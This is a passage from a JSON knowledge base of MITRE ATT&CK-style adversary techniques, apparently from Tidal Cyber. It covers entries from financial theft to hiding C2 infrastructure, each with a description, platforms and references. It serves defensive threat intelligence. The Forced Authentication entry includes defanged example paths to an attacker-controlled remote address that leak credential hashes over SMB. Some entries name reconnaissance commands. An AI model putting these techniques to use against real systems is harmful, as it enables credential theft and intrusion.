paths.<sup>[[new_rust_based_ransomware](https://app.tidalcyber.com/references/8206240f-c84e-442e-b025-f629e9cc8d91)]</sup><sup>[[bad_luck_blackcat](https://app.tidalcyber.com/references/0d1e9635-b7b6-454b-9482-b1fc7d33bfff)]</sup><sup>[[falconoverwatch_blackcat_attack](https://app.tidalcyber.com/references/9d0ff77c-09e9-4d58-86f4-e2398f298ca9)]</sup><sup>[[blackmatter_blackcat](https://app.tidalcyber.com/references/605b58ea-9544-49b8-b3c8-0a97b2b155dc)]</sup><sup>[[fsutil_behavior](https://app.tidalcyber.com/references/07712696-b1fd-4704-b157-9e420840fb2c)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "cb2e4822-2529-4216-b5b8-75158c5f85ff",
|
||
"value": "File and Directory Permissions Modification"
|
||
},
|
||
{
|
||
"description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,<sup>[[FBI-ransomware](https://app.tidalcyber.com/references/54e296c9-edcc-5af7-99be-b118da29711f)]</sup> business email compromise (BEC) and fraud,<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> \"pig butchering,\"<sup>[[wired-pig butchering](https://app.tidalcyber.com/references/dc833e17-7105-5790-b30b-b4fed7fd2d2f)]</sup> bank hacking,<sup>[[DOJ-DPRK Heist](https://app.tidalcyber.com/references/c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac)]</sup> and exploiting cryptocurrency networks.<sup>[[BBC-Ronin](https://app.tidalcyber.com/references/8e162e39-a58f-5ba0-9a8e-101d4cfa324c)]</sup> \n\nAdversaries may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) to conduct unauthorized transfers of funds.<sup>[[Internet crime report 2022](https://app.tidalcyber.com/references/ef30c4eb-3da3-5c7b-a304-188acd2f7ebc)]</sup> In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) <sup>[[NYT-Colonial](https://app.tidalcyber.com/references/58900911-ab4b-5157-968c-67fa69cc122d)]</sup> and [Exfiltration](https://app.tidalcyber.com/tactics/66249a6d-be4e-43ab-a295-349d03a98023) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.<sup>[[Mandiant-leaks](https://app.tidalcyber.com/references/aecc3ffb-c524-5ad9-b621-7228f53e27c3)]</sup> Adversaries may use dedicated leak sites to distribute victim data.<sup>[[Crowdstrike-leaks](https://app.tidalcyber.com/references/a91c3252-94b8-52a8-bb0d-cadac6afa161)]</sup>\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and business disruption.<sup>[[AP-NotPetya](https://app.tidalcyber.com/references/7f1af58a-33fd-538f-b092-789a8776780c)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9",
|
||
"value": "Financial Theft"
|
||
},
|
||
{
|
||
"description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.<sup>[[Symantec Chernobyl W95.CIH](https://app.tidalcyber.com/references/a35cab17-634d-4a7a-a42c-4a4280e8785d)]</sup> Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.<sup>[[dhs_threat_to_net_devices](https://app.tidalcyber.com/references/f1d16045-d365-43d2-bc08-65ba1ddbe0fd)]</sup><sup>[[cisa_malware_orgs_ukraine](https://app.tidalcyber.com/references/ebe89b36-f87f-4e09-8030-a1328c0b8683)]</sup> Depending on the device, this attack may also result in [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34). ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "559c647a-7759-4943-856d-dc717b5a443e",
|
||
"value": "Firmware Corruption"
|
||
},
|
||
{
|
||
"description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. <sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. <sup>[[Didier Stevens WebDAV Traffic](https://app.tidalcyber.com/references/b521efe2-5c1c-48c5-a2a9-95da2367f537)]</sup> <sup>[[Microsoft Managing WebDAV Security](https://app.tidalcyber.com/references/eeb7cd82-b116-4989-b3fa-968a23f839f3)]</sup>\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. <sup>[[GitHub Hashjacking](https://app.tidalcyber.com/references/d31f6612-c552-45e1-bf6b-889fe619ab5f)]</sup> With access to the credential hash, an adversary can perform off-line [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) cracking to gain access to plaintext credentials. <sup>[[Cylance Redirect to SMB](https://app.tidalcyber.com/references/32c7626a-b284-424c-8294-7fac37e71336)]</sup>\n\nThere are several different ways this can occur. <sup>[[Osanda Stealing NetNTLM Hashes](https://app.tidalcyber.com/references/991f885e-b3f4-4f3f-b0f9-c9862f918f36)]</sup> Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. <sup>[[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]</sup>\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\\\[remote address]\\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. <sup>[[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e732e1d4-fffa-4fc3-b387-47782c821688",
|
||
"value": "Forced Authentication"
|
||
},
|
||
{
|
||
"description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e), [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nThe generation of web credentials often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.<sup>[[GitHub AWS-ADFS-Credential-Generator](https://app.tidalcyber.com/references/340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8)]</sup> Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.<sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup><sup>[[Zimbra Preauth](https://app.tidalcyber.com/references/f8931e8d-9a03-5407-857a-2a1c5a895eed)]</sup>\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup><sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d8507187-cea6-4be2-95b4-e875924e58c0",
|
||
"value": "Forge Web Credentials"
|
||
},
|
||
{
|
||
"description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4acf57da-73c1-4555-a86a-38ea4a8b962d",
|
||
"value": "Gather Victim Host Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup><sup>[[Obsidian SSPR Abuse 2023](https://app.tidalcyber.com/references/7f28f770-ef06-5923-b759-b731ceabe08a)]</sup> Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup><sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup>\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "aea36489-047e-4c4a-ab26-c51fd3556182",
|
||
"value": "Gather Victim Identity Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "58776ca9-0c54-487f-afcc-e7e5b661bd54",
|
||
"value": "Gather Victim Network Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e55d2e4b-07d8-4c22-b543-c187be320578",
|
||
"value": "Gather Victim Org Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>\n\nAdversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.<sup>[[Microsoft gpresult](https://app.tidalcyber.com/references/88af38e8-e437-4153-80af-a1be8c6a8629)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup> Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://app.tidalcyber.com/technique/d092a9e1-63d0-415d-8cd0-666a261be5d9)) for their benefit.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d97d754d-92d5-4874-bbfe-5aa4d581f2a8",
|
||
"value": "Group Policy Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.<sup>[[Ossmann Star Feb 2011](https://app.tidalcyber.com/references/1be27354-1326-4568-b26a-d0034acecba2)]</sup><sup>[[Aleks Weapons Nov 2015](https://app.tidalcyber.com/references/fd22c941-b0dc-4420-b363-2f5777981041)]</sup><sup>[[Frisk DMA August 2016](https://app.tidalcyber.com/references/c504485b-2daa-4159-96da-481a0b97a979)]</sup><sup>[[McMillan Pwn March 2012](https://app.tidalcyber.com/references/6b57e883-75a1-4a71-accc-2d18148b9c3d)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4557bfb9-b940-49b6-b8be-571979134419",
|
||
"value": "Hardware Additions"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup><sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f37f0cd5-0446-415f-9309-94e25aa1165d",
|
||
"value": "Hide Artifacts"
|
||
},
|
||
{
|
||
"description": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,<sup>[[TA571](https://app.tidalcyber.com/references/5b463ad7-f425-5e70-b0b0-28514730a888)]</sup> masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,<sup>[[Schema-abuse](https://app.tidalcyber.com/references/75b860d9-a48d-57de-ba1e-b0db970abb1b)]</sup><sup>[[Facad1ng](https://app.tidalcyber.com/references/bd80f3d7-e653-5f8f-ba8a-00b8780ae935)]</sup><sup>[[Browser-updates](https://app.tidalcyber.com/references/89e913a8-1d52-53fe-b692-fb72e21d794f)]</sup> and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.\n\nC2 networks may include the use of [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.<sup>[[sysdig](https://app.tidalcyber.com/references/80cb54c2-2c44-5e19-bbc5-da9f4aaf976a)]</sup><sup>[[Orange Residential Proxies](https://app.tidalcyber.com/references/df4b99f3-1796-57b3-a352-37be5380badc)]</sup>\n\nAdversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.<sup>[[mod_rewrite](https://app.tidalcyber.com/references/3568b09c-7368-5fc2-85b3-d16ee9b9c686)]</sup><sup>[[SocGholish-update](https://app.tidalcyber.com/references/01d9c3ba-29e2-5090-b399-0e7adf50a6b9)]</sup> Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)).<sup>[[TA571](https://app.tidalcyber.com/references/5b463ad7-f425-5e70-b0b0-28514730a888)]</sup><sup>[[mod_rewrite](https://app.tidalcyber.com/references/3568b09c-7368-5fc2-85b3-d16ee9b9c686)]</sup>\n\nHiding C2 infrastructure may also be supported by [Resource Development](https://app.tidalcyber.com/tactics/989d09c2-12b8-4419-9b34-a328cf295fff) activities such as [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) and [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.<sup>[[StarBlizzard](https://app.tidalcyber.com/references/68b16960-1893-51a1-b46c-974a09d4a0c4)]</sup><sup>[[QR-cofense](https://app.tidalcyber.com/references/eda8270f-c76f-5d01-b45f-74246945ec50)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a3a2a527-39e7-58b4-a3cc-932eb0cef562",
|
||
"value": "Hide Infrastructure"
|
||
},
|
||
{
|
||
